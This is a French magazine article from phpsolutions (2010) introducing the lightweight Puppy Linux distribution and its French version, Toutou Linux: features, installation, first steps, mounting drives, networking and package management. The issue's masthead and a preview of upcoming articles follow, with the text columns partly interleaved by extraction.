• La distribution Puppy Linux. • Il est nécessaire de connaître le fonction-
nement d’une distribution, la notion de
montage d’un disque dur, clé USB...Il fau-
dra aussi parfois connaître un peu les ca-
ractéristiques de son ordinateur.
système qu’une autre distribution. En cas
d’utilisation d’un CD, le lecteur CDRom
Niveau de difficulté devient disponible pour la lecture d’un CD
audio ou pour regarder une vidéo. Au ni-
veau des programmes, elle contient tout
ce dont vous avez besoin pour un usage fa-
sera rempli, Toutou Linux vous proposera
de créer un nouveau CD/DVD incluant le
système et vos données. Au prochain redé-
marrage, vous retrouverez donc vos données
et pourrez continuer à travailler ! Petite in-
fo : le multi-session sur DVD est beaucoup
moins coûteux en terme de place que celui
sur CD !
Installation
Vous avez hâte de tester Puppy/Toutou
Linux ? Cette partie va nous y aider ! Il est
possible d’installer cette distribution sur :

P
uppy Linux est une distribution Linux
créée par Barry Kauler en 2002 et cons-
tamment améliorée par son auteur
et une communauté active de développeurs.
Grâce aux efforts de Jean-Jacques Moulinier,
la version française de Puppy Linux, à savoir
Toutou Linux est née ! Quelques différences
existent mais pour le plus grand bonheur des
utilisateurs francophones. Ces distributions
en sont, à l’heure d’écrire ces quelques lignes,
à la version 4.3.1 Pourquoi vous parler encore
d’une énième distribution Linux et pourquoi
l’utiliser ? J’ai découvert cette distribution il
y a quelque temps. Elle m’avait bluffé de par
sa petite taille, sa rapidité et surtout par l’inté-
gration des dernières technologies. Elle savait
déjà gérer la gravure sur Blu-ray ! La partie wi-
fi est également bien supportée !
Cette distribution est donc fiable, facile
d’utilisation tout en étant particulièrement
légère puisqu’elle n’occupe qu’un peu plus
de 110 Mo sans sacrifice au niveau des fonc-
tionnalités. Elle intègre la gestion des maté-
riels les plus récents mais reste aussi adaptée
aux anciens ordinateurs. En effet, la spéci-
ficité de Toutou Linux (et donc de Puppy
Linux) est qu’elle se charge entièrement en
RAM. Cela permet un accès plus rapide au
milial : traitement de texte, tableur, retou- • disque dur,
che d’images, lecteur multimédia, internet, • une clé USB ou tout type de mémoire
tchat, etc... flash associé à un lecteur,
Toutou Linux essaie de paramétrer seul vo- • un CD/DVD,
tre matériel, trouve et monte toutes les parti- • un lecteur ZIP,
tions en lecture/écriture même le NTFS. En • une machine virtuelle,
complément, elle intègre un grand nombre • un réseau éthernet,
de scripts pour la configuration du matériel • etc...
et de l’interface utilisateur.
A la fin de votre session, Toutou Linux en- Sur certaines machines, pas forcément très ré-
registre tous vos paramètres et vos données centes, il sera nécessaire d’utiliser une disquet-
soit sur une partition Windows, Linux ou te de boot afin de permettre le chargement du
même sur le CD/DVD Live lui-même ! Cet- système contenu sur une clé USB. Dans tous
te distribution est en effet capable d’écrire les cas, il faudra paramétrer le BIOS en consé-
vos paramètres et données sur ces supports quence : démarrage sur USB/CDROM/ZIP...
à condition qu’ils soient multi-session. Ain- en premier. Le plus simple ici est de récupérer
si, chaque session de travail représentera l’image iso de la distribution :
Astuces
Une petite astuce qui est plus une mise en garde, faites attention à la façon dont sont nom-
més certains fichiers. Ainsi si vous faîtes une impression d’écran avec la touche Impr écran, Tou-
tou Linux vous propose d’enregistrer le résultat sur le disque en utilisant par défaut l’heure de
création comme début du nom (15:30:20.jpg). Aucun souci pour des partitions Linux. Mais ce
nom posera problème au niveau NTFS et FAT de Windows. Le caractère : étant interdit pour le
nommage des fichiers. Si cela arrive, Windows sera incapable de les lire, de les ouvrir ou même
de les supprimer. Il faudra revenir à Linux et les renommer...

54 4/2010
 Puppy Linux

• Puppy Linux à l’adresse suivante : ftp://

ibiblio.org/pub/linux/distributions/
puppylinux/puppy-4.3.1/pup-431.iso,
• Toutou Linux à l’adresse suivante : ftp://
download.tuxfamily.org/toutou/Tou-
touLinux-431.iso,

et de la graver sur un support de type CD

ou DVD en précisant l’option multi-ses-
sion afin de permettre l’enregistrement des
paramètres et des données ! Pour les autres
supports, il suffira de passer par l’icône Pa-
ramètres et gravure sur un support à choisir
parmi une liste bien fournie. Les utilisateurs
de Windows utiliseront donc très certaine-
ment Nero tandis que les Linuxiens se pen-
cheront vers l’excellent K3B ! Il existe une
autre méthode pour l’installation sur clé
USB sans passer par le Live-CD. Je ne rentre-
rai pas dans les détails mais il s’agit du logi-
ciel UNetbootin que l’on trouve en français
à cette adresse : http://unetbootin.sourcefor-
ge.net/ fonctionnant à la fois sous Windows Figure 1. Ecran d'accueil
et sur Linux. L’avantage de ce logiciel est
qu’il télécharge tout seul l’image ISO et crée
automatiquement la clé USB. Il y a aussi sys-
linux en ligne de commande existant aussi
pour Windows et Linux. Personnellement,
je pense que la méthode du Live-CD est plus
rapide à mettre en œuvre pour une première
découverte. De plus, il y a beaucoup moins
de soucis techniques pour booter sur un
CD/DVD que sur une clé USB. Une petite
clé USB de 128 Mo suffira. Évidemment, il
ne restera plus beaucoup de place pour vos
documents personnels !

Premiers pas
Allez ! Que diable ! Redémarrez au plus vite
votre ordinateur pour voir enfin se charger
cette distribution ! Après quelques informa-
tions données sur le chargement en mémoire,
la reconnaissance des périphériques, il vous
sera demandé de choisir votre type de clavier
(donc fr pour nous français !). Viendra ensui-
te le choix du serveur graphique. Préférez xorg
pour les machines récentes et xvesa pour les
plus anciennes. De toute façon, essayez xorg
en premier, cela ne coûte rien ! Sélectionnez
ensuite la résolution de votre écran associée
au nombre de couleurs. Les moniteurs CRT
et bien sûr les moniteurs LCD sont reconnus
convenablement.
Le serveur graphique démarre automati-
quement et le magnifique bureau de Tou-
tou Linux (Figure 1) finit par s’afficher.
Les utilisateurs des versions précédentes
auront tout de suite remarqués que les
couleurs bleutées des versions antérieures
laissent ici la place à un nouveau thème.
Je le trouve, pour ma part, plus joli et plus
harmonieux. Certains diront que la cou-
leur des icônes est trop proche du thème
Figure 2. Tableau de bord - Installation
du bureau et qu’il devient plus difficile de
les différencier...Pour information, Puppy/
Toutou Linux utilisent l’environnement
de bureau ROX et le gestionnaire de fenê-
tre JWM.
Une boîte de dialogue se tient au centre
de l’écran vous proposant de vous docu-
menter de façon rapide sur la distribution,
de régler les paramètres de localisation, de
gérer la connexion internet/lan, de confi-
gurer une imprimante, etc...Vous verrez
que tout est conçu pour faciliter la vie de
l’utilisateur et ainsi ne jamais le prendre
au dépourvu. Rares seront les cas où il fau-
dra se débrouiller seul en ligne de com-
mandes.
Sur le bureau, l’icône paramètres vous per-
mettra de régler le matériel et le système en
lui-même. C’est également à partir de cet
endroit que vous pourrez installer la distri-
bution sur un autre support (clé USB, ZIP,
disque dur...) (Figure 2). Cette méthode
présente l’avantage d’être entièrement auto-
matisée mise à part l’installation sur disque
dur. Dans ce cas, vous aurez à partitionner
votre disque comme pour n’importe quelle
autre distribution sous peu que l’on choi-
sisse une méthode autre que l’installation
automatique ! Là encore, Toutou Linux in-
tègre un logiciel de partitionnement !
Dans la barre du bas, à côté de l’heure, le
taux d’occupation de la RAM est présent.

www.phpsolmag.org 55
 Linux
Figure 3. Points de montage
Figure 4. Connexions réseaux
56
Il vous indique la quantité de mémoire qu’il
vous reste. Attention de ne pas descendre en
dessous de 5 Mo.
Les principaux logiciels utilisables sont
aussi directement accessibles sur le bureau
par leurs icônes respectives. Vous retrouverez
donc par exemple :
• Abiword pour le traitement de texte,
• Gnumeric pour le tableur,
• mtPaint pour la retouche légère d’ima-
ges,
• InkscapeLite pour le dessin vectoriel,
• Seamonkey pour internet et le tchat par
meebo.com,
• Gxine pour le lecteur multimédia.
Pour le reste, le menu regroupe toutes les
applications disponibles classées par thè-
mes. Ainsi, vous devriez avoir des outils
pour le bureau, le système, la configuration,
le réseau, la gravure (même les Blu-ray sont
supportés à condition que votre matériel le
puisse !),etc...
Comme vous pouvez le constater, Tou-
tou Linux comprend toutes les applica-
tions nécessaires à l’utilisation d’un ordi-
nateur familial. Il ne manque pas grand
chose même si certaines personnes préfére-
ront d’autres outils que ceux fournis. Cet-
te distribution a choisi des programmes
fonctionnels et surtout très légers. Cela
rend l’exécution plus rapide, ne demande
qu’une petite quantité de mémoire et fonc-
tionne du coup sur des machines ancien-
nes !
Beaucoup de débutants dans le monde
Linux ont un peu de mal avec le montage
des disques durs, clés USB et autres CD/
DVD. Toutou Linux vous facilite encore
grandement la vie ! Tous les périphériques
de stockage sont reconnus au démarrage et
sont présents sous forme d’icônes en bas
du bureau (Figure 3). Oui, là ! Les fameu-
ses icônes fd0, sda1, sr0, sdb1. Je ne ren-
trerai pas ici dans le détail concernant les
noms donnés aux périphériques, cela sort
du cadre de cet article. De toute façon, les
icônes sont assez explicites ! Les icônes gri-
ses représentent une partition non montée.
Une icône de couleur avec un point vert re-
présente quant à elle une partition montée.
La connexion d’un nouveau périphérique
comme une clé USB fera apparaître au bout
de quelques secondes une icône grisée. Pour
monter la partition de cette clé et donc la
rendre utilisable, il suffit de cliquer gauche
dessus avec la souris, tout simplement. Pour
la démonter, un clic droit, démonter et hop
la clé USB est libérée ! Vous pouvez aussi
vous servir de l’icône en haut du bureau
nommée (dé)monter qui regroupe tous les
supports détectés.
4/2010
 Puppy Linux

La configuration du réseau n’est guère

plus difficile. Si vous êtes connecté à internet
par l’intermédiaire d’un câble RJ45 (Ether-
net) à une box ou un routeur, il y a de grande
chance pour que vous n’ayez rien à faire. Vo-
tre connexion est déjà initialisée au démar-
rage de votre distribution. Il se peut que Tou-
tou Linux n’arrive pas à déterminer le chipset
de votre carte réseau ou le chipset de la carte
mère gérant le réseau. Dans ce cas, il suffira
de le choisir dans le liste proposée à condi-
tion de connaître ce fameux chipset. La par-
tie Wifi n’a pas été oubliée et un utilitaire de
configuration a été prévu ! Pour y accéder,
utilisez l’icône Paramètres en haut du bureau
et l’onglet Réseau du tableau de bord (Figu-
re 2). Comme pour les autres distributions,
il faudra tout de même que le matériel Wifi
soit compatible Linux et non exclusivement
Windows. Pour mon expérience propre, le
chipset Atheros est très bien supporté par
Toutou Linux. L’icône du bureau connexion
vous permet d’administrer tout votre réseau
(Figure 4).
Il n’est pas possible de présenter et d’ex- Figure 5. Gestionnaire de paquets
pliquer toutes les fonctionnalités de Toutou
Linux. Au final, cette distribution regrou- bureau pour retrouver l’utilitaire les gérant te très puissante au niveau des fonctionnali-
pe un grand nombre d’outils pour para- de façon graphique (Figure 5). Le gestion- tés et de sa compatibilité avec le matériel ré-
métrer simplement et au mieux son maté- naire présente les paquets installés et instal- cent. Facile à prendre en main, ultra légère,
riel même le plus récent. Vous trouverez lables de la même manière que les grandes discrète au fond d’une poche sous forme de
de toute façon beaucoup de tutoriels pour distributions type Debian, Mandriva, Suse clé USB, vous pourrez utiliser une plate-for-
Puppy/Toutou Linux sur internet. Preuve ou Fedora. Tous les logiciels sont classés me Linux n’importe où en emportant vos
que cette version de Linux est particulière- par thèmes. Vous n’avez plus qu’à choisir données personnelles. La version Toutou
ment appréciée ! N’oubliez pas aussi l’icô- ceux dont vous avez besoin. Vous échappe- Linux apporte une convivialité renforcée
ne Aide du bureau qui, comme son nom le rez donc à la fameuse installation manuelle par sa traduction en français. Sachez aussi
laisse supposer, répondra à beaucoup de vos (./configure, make, make install...). Les pa- qu’il existe des variantes de Puppy Linux
questions ! quets Puppy/Toutou Linux sont dérivés des adaptées à vos différents besoins comme
paquets Slackware. N’ayez crainte, Puppy/ par exemple :
Ajout d’applications Toutou Linux n’est pas un clone et garde
Et si malgré tout, vous vouliez ajouter de son indépendance. • la très prometteuse Pupeee pour les net-
nouveaux logiciels ? Rien de plus simple ! book comme les Eee PC,
Toutou Linux a pensé à tout et intègre un Conclusion • EduPup, destinée aux enfants,
gestionnaire de paquets propre à son sys- J’espère vous avoir donné envie d’essayer • Cloudy Skies Live : Puppy version Astro-
tème. Utilisez l’icône Paquets en haut du cette petite distribution qui malgré tout res- nomie et tracking Satellite,
• GrafPup, destinée aux professionnels de
l’image,
Sur Internet • Digipup : Puppy version radioamateur .

• http://puppylinux.org/main/index.php?file=Overview%20and%20Getting Au fait, ne cherchez pas de mot de passe root,

%20Started.htm – Site de Puppy Linux, c’est une des rares distributions en mode su-
• http://toutoulinux.free.fr/index.php – Le site de Toutou Linux, per-utilisateur par défaut.

Des tutoriels intéressants :

• http://infoprographiesimple.free.fr/toutou_linux_usb/toutou_linux_usb.
php
• http://toutoulinux.free.fr/tuto.php
• http://www.libellules.ch/phpBB2/mettre-en-reseaux-toutou-linux-et-win- LAURENT DEROSIER
dows-t26841.html Laurent DEROSIER a découvert Linux en 2003. Il
• http://zorgue.over-blog.fr/article-34251288.html s’efforce depuis de partager sa passion pour ce
système. Il travaille dans le domaine des réseaux
et des serveurs à base d’Unix.

www.phpsolmag.org 57
Dans le prochain numéro de
Le périodique phpsolutions est publié par
Software Press Sp. z o.o. SK
Bokserska 1, 02-682 Varsovie, Pologne
Tél. 0975180358, Fax. +48 22 244 24 59
www.phpsolmag.org
Président de Software Press Sp. z o.o. SK : Paweł Marciniak
Directrice de la publication : Ewa Łozowicka
Dépôt légal : à parution
ISSN : 1731-4593
Rédacteur en chef : Łukasz Bartoszewicz
Maquette : Agnieszka Marchocka
Couverture : Agnieszka Marchocka
DTP : Sławomir Sobczyk [email protected]
Composition : Sławomir Sobczyk
Correction : Valérie Viel, Jonathan Marois, Alain Ribault
FICHE TECHNIQUE
„ Comparatifs de Frameworks JavaScripts
Au fil des années, on a vu apparaître de nombreuses
bibliothèques JavaScript comme Jquery or LightBox. Elles
permettent en ajoutant quelques lignes de code de faire un rendu
graphique optimisé. Cet article vous propose de vous présenter
les principales bibliothèques et de les comparer.
PRATIQUE
„ Les DAO en PHP
Un DAO (Data Access Object ou object d’accès aux données) est
un objet qui fournit une interface générique d’accès aux données
persistantes stockées en base de données ou dans des fichiers
par exemple. Le modèle DAO est un motif de conception qui
permet de ne pas exposer la structure d’une base de données
et de séparer la logique métier de celle de l’accès aux données.
Et de nombreux autres articles à ne pas manquer !
La rédaction se réserve le droit de modifier le contenu de la revue.
Bêta-testeurs : Fabrice Gyre, Brice Favre, Valérie Viel, Aymeric Lagier,
Christophe Milhau, Alain Ribault, Stéphane Guedon, Eric Boulet,
Mickael Puyfages, Christian Hernoux, Isabelle Lupi, Antoine Beluze,
Timotée Neullas, Yann Faure, Adrien Mogenet, Jean-François Montgaillard,
Turmeau Nicolas, Jonathan Marois, Wilfried Ceron, Wajih Letaief,
François Van de Weerdt, Jeremy Rafflin, Eric Vincent.
Les personnes intéressées par la coopération sont priées de nous contacter :
[email protected]
Publicité : [email protected]
Pour créer les diagrammes on a utilisé le programme
AVERTISSEMENT
Les techniques présentées dans les articles ne peuvent être utilisées qu’au
sein des réseaux internes. La rédaction du magazine n’est pas responsable
de l’utilisation incorrecte des techniques présentées. L’utilisation des techniques
présentées peut provoquer la perte des données !
POUR LES DÉBUTANTS
„ Développez des gadget pour
la Windows sidebar
Vous avez certainement déjà vu les PC de démonstration
avec Windows Vista ou Seven et la petite sidebar sur la coté
proposant des gadgets. Nous vous proposons de vous reposer
l’esprit en ne développant qu’avec du HTML, CSS et Javascript.
Les gadgets ont envahi le bureau Windows depuis Windows
Vista. Certains affichent l’heure, d’autres des contenu de flux
RSS, et d’autres encore un calendrier. Ces mini-applications sont
une forme raccourcie d’accèder à un contenu multimédia. Vous
allez voir comment réaliser des gadgets Windows.
OUTILS
„ Un moteur de template : Smarty
Qu’est-ce qu’un moteur de template ? Pourquoi utiliser un tel
outil ? Cet article vous présente les moteurs de template et plus
particulièrement Smarty. Vous apprendrez ce que sont les
moteurs de template et plus particulièrement Smarty et vous
verrez comment intégrer Smarty dans vos applications..